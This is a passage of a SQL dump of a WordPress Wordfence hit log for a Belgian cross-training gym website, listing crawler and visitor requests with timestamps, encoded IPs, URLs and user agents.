(69920, 1492569740.544716, 2996488207, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69921, 1492570885.357905, 676177756, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/feed/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69922, 1492576880.187606, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(69923, 1492577717.014871, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(69924, 1492577886.552213, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69925, 1492579941.885765, 1489376164, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(69926, 1492579944.311311, 1489376164, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(69927, 1492581321.067083, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(69928, 1492581321.952505, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69929, 1492581322.711327, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69930, 1492581323.189675, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69931, 1492581323.669148, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69932, 1492581324.066602, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69933, 1492581324.741391, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69934, 1492581325.824193, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(69935, 1492581326.643026, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69936, 1492581327.476415, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69937, 1492581327.913925, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69938, 1492581328.414046, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69939, 1492581328.898953, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69940, 1492581329.317465, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69941, 1492581778.894395, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69942, 1492584051.428583, 1054014312, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(69943, 1492585694.071219, 2637637607, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69944, 1492585715.661876, 2637637607, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69945, 1492591092.538061, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(69946, 1492591093.027277, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69947, 1492591093.504339, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69948, 1492591093.918590, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69949, 1492591094.395708, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69950, 1492591094.787323, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69951, 1492591095.199685, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69952, 1492591095.635423, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(69953, 1492591096.084574, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69954, 1492591096.490452, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69955, 1492591096.887057, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69956, 1492591097.381476, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69957, 1492591097.836161, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69958, 1492591098.271068, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69959, 1492593815.999863, 2513051914, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-temporary.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69960, 1492596508.538603, 1586277993, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69961, 1492596510.087494, 1586277993, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69962, 1492596515.438887, 1586277993, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69963, 1492596535.288429, 1586277993, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69964, 1492596536.257962, 1586277993, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69965, 1492596542.555394, 1586277993, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69966, 1492596543.751922, 1586277993, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69967, 1492596554.881379, 1586277993, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69968, 1492596560.550435, 1586277993, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69969, 1492596562.144500, 1586277993, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69970, 1492597775.745412, 872366352, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69971, 1492597796.065351, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69972, 1492605308.046299, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/27.0.1453 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69973, 1492606567.015246, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(69974, 1492606567.645018, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69975, 1492606568.187232, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69976, 1492606568.661036, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69977, 1492606569.390780, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69978, 1492606569.920954, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69979, 1492606570.547463, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69980, 1492606571.041485, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69981, 1492606571.781365, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69982, 1492606572.538879, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69983, 1492606572.985673, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69984, 1492606834.835880, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(69985, 1492606835.334750, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69986, 1492606835.736615, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69987, 1492606836.157707, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69988, 1492606836.662785, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69989, 1492606837.063816, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69990, 1492606837.532909, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69991, 1492606837.996308, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(69992, 1492606838.240776, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(69993, 1492606838.686679, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69994, 1492606839.181909, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69995, 1492606839.596219, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69996, 1492606840.085442, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69997, 1492606840.585824, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69998, 1492606840.992049, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69999, 1492606841.444787, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(70000, 1492606841.932496, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70001, 1492606842.432619, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70002, 1492606842.843513, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70003, 1492606843.315121, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70004, 1492606843.767568, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70005, 1492606844.172197, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70006, 1492610684.605833, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70007, 1492610685.279577, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70008, 1492610685.766047, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70009, 1492610686.352187, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70010, 1492610688.515897, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70011, 1492610689.704492, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70012, 1492610690.305971, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70013, 1492610691.264650, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(70014, 1492610692.101246, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70015, 1492610692.494956, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70016, 1492610692.938553, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70017, 1492610693.427682, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70018, 1492610693.832900, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70019, 1492610694.271462, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70020, 1492612063.309817, 1123632467, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70021, 1492612064.267069, 1123631313, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70022, 1492614095.888548, 876230790, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(70023, 1492614099.352699, 876230790, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(70024, 1492620372.756452, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70025, 1492620373.251024, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70026, 1492620373.683350, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70027, 1492620374.264068, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70028, 1492620374.812452, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70029, 1492620375.208788, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70030, 1492620375.645059, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70031, 1492620375.832327, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70032, 1492620376.340145, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70033, 1492620376.793719, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70034, 1492620377.278237, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70035, 1492620377.786547, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70036, 1492620378.188388, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70037, 1492620378.623244, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70038, 1492620378.908812, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70039, 1492620378.997407, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70040, 1492620379.414779, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
